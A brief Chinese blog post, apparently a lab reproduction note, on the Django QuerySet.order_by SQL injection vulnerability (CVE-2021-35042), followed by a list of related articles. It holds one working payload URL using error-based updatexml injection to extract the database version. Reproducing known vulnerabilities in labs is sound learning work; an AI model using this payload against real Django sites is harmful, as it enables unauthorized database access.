漏洞描述
Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。
参考链接:
该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。
漏洞环境及利用
搭建docker环境
payload
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23
Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)
blackK_YC2023-11-26 19:09
相关推荐
noravinsc5 小时前
django.db.models.query_utils.DeferredAttribute objectwangzhongyudie8 小时前
SQL实战:03之SQL中的递归查询阿达C11 小时前
MySQL常用函数详解及SQL代码示例有被蠢哭到13 小时前
SQL面试之--明明建了索引为什么失效了?ABCDEEE716 小时前
人事管理系统6xieyan081117 小时前
Django的异步任务队列管理_Celeryweixin_3077791318 小时前
Azure Synapse Dedicated SQL pool企业权限管理猫头虎18 小时前
数据库中DDL、DML、DCL的区别是什么?编程自留地19 小时前
第10次:电商项目配置开发环境剑哥在胡说19 小时前
Python三大Web框架对比:Django、Flask、Tornado的异步实现方式详解